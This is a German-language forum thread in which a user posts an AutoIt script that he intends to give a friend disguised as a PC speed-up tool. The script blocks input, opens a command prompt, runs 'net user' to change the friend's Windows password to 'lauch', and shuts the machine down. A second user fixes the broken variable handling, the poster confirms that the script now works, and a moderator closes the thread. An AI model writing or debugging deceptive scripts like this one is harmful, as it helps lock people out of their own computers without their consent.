Register for your free account! | Forgot your password?

Go Back   elitepvpers > Coders Den > AutoIt
You last visited: Today at 10:40

  • Please register to post and access all features, it's quick, easy and FREE!

Advertisement



Was mache ich falsch? Q_Q

Discussion on Was mache ich falsch? Q_Q within the AutoIt forum part of the Coders Den category.

Closed Thread
 
Old   #1
 
Hackiing-.-'s Avatar
 
elite*gold: 0
Join Date: Mar 2009
Posts: 521
Received Thanks: 253
Was mache ich falsch? Q_Q

Hallo!
Ich habe mich gestern mal mit AutoIT beschäftigt, da ich das ziemlich interessant finde.
Nun wollte ich meinen Kumpel ärgern und ihm verklickern, dass der Script seinen PC schneller macht ;D..
Doch in Wahrheit, ändert dass sein PW D..

Hier der Script :
Code:
$id = InputBox ("Daten", "Benutzername deines PCs")
Sleep (500)
BlockInput (1)
Send("#r")
WinWaitActive("Ausführen")
Sleep (1000)
Send("cmd.exe")
Send ("{enter}")
Sleep (1000)
Send ("net user $id *")
Send ("{enter}")
Send ("lauch")
Sleep (500)
Send ("{enter}")
Send ("lauch")
Sleep (500)
Send ("{enter}")
Shutdown (0)
Aber des funkt einfach nicht -_-
Wäre dankbar für Hilfe :S

Hackiing-.-
Hackiing-.- is offline  
Old 05/05/2010, 14:28   #2
 
HardCore.1337's Avatar
 
elite*gold: 1
Join Date: Feb 2009
Posts: 1,726
Received Thanks: 729
Was geht daran nicht?
Du musst im übrigen erstmal den Ausführen Dialog starten. Aber noch besser geht das so:

Run("cmd.exe")
HardCore.1337 is offline  
Old 05/05/2010, 14:38   #3
 
Hackiing-.-'s Avatar
 
elite*gold: 0
Join Date: Mar 2009
Posts: 521
Received Thanks: 253
Quote:
Originally Posted by General Desert View Post
Was geht daran nicht?
Du musst im übrigen erstmal den Ausführen Dialog starten. Aber noch besser geht das so:

Run("cmd.exe")
Die Variable funkt nicht. Er schreibt dann immer "net user $id *" hin, statt dass was in die InputBox geschrieben wurde.

Der Ausführen Dialog wird geöffnet durch "Send ("#r") "
Hackiing-.- is offline  
Old 05/05/2010, 14:41   #4
 
HardCore.1337's Avatar
 
elite*gold: 1
Join Date: Feb 2009
Posts: 1,726
Received Thanks: 729
ja, aber run("cmd") ist besser.
Zu der Variable

Send("Bla" & $ID)
HardCore.1337 is offline  
Thanks
1 User
Old 05/05/2010, 14:50   #5
 
Hackiing-.-'s Avatar
 
elite*gold: 0
Join Date: Mar 2009
Posts: 521
Received Thanks: 253
Danke geht perfekt ;D
Hackiing-.- is offline  
Old 05/06/2010, 09:49   #6


 
Cholik's Avatar
 
elite*gold: 4
Join Date: Aug 2008
Posts: 6,786
Received Thanks: 4,992
Was du falsch machst ? Du postest eine Frage in der Release-Sektion...

#moved
#closed
Cholik is offline  
Closed Thread


Similar Threads Similar Threads
Was mache ich Falsch? xD
05/15/2010 - Metin2 Private Server - 2 Replies
Hey epvp also ich hab folgendes Problem. Seitdem es diese Mc exen gibt und so Kann ich einfach nicht mehr cheaten also port hack von Banjo1 und so ?? Welchen Server muss ich auswählen. aber bin alles durchgegangen bei keinm hatt der funktioniert.
Was mache ich falsch?
05/13/2010 - Metin2 Private Server - 7 Replies
Hallo, Ich mache schon das 5. einen Server, alles läuft perfekt bis Waffen entbuggen. Ich verstehe nicht was ich falsch mache. Wenn ich entbugge und reboote kommt immer Connection Resuded oder so ähnliches. Und ja ich mache alles genauso wie im Tutorial.... An welchen gründen kann es den liegen? Danke im voraus.
Was mache ich falsch?
10/27/2009 - Metin2 Private Server - 6 Replies
Youtube Bitte um Antworten thx :)
WPM - Cpp - was mache ich falsch...
10/20/2009 - General Coding - 3 Replies
Hallo, Ich wollte die Adresse, die für die Lebenspunkte in Risen zuständig ist, nopen. Das Spiel stürzt aber ab, wenn ich z.B. von einer Klippe o.ä. springe. Ich kann die Ursache jedoch nicht finden. Adresse: 202D9055 Original: 279870601 hex: 0x10AE7C89 Noped: 2425393296 hex: 0x90909090 int lebenhackan = {0x90, 0x90, 0x90, 0x90};
WAS MACHE ICH FALSCH -.-
10/17/2009 - Metin2 Private Server - 7 Replies
bitte sagt mir was ich falsch mache 1.http://www.bilder-hochladen.net/files/b4xb-d-jp g.html 2. http://www.bilder-hochladen.net/files/b4xb-b-jpg.h tml 3.http://www.bilder-hochladen.net/files/b4xb-c-jp g.html 4.http://www.bilder-hochladen.net/files/b4xb-e-jp g.html



All times are GMT +2. The time now is 10:40.


Powered by vBulletin®
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
SEO by vBSEO ©2011, Crawlability, Inc.
This site is protected by reCAPTCHA and the Google Privacy Policy and Terms of Service apply.

Support | Contact Us | FAQ | Advertising | Privacy Policy | Terms of Service | Abuse
Copyright ©2024 elitepvpers All Rights Reserved.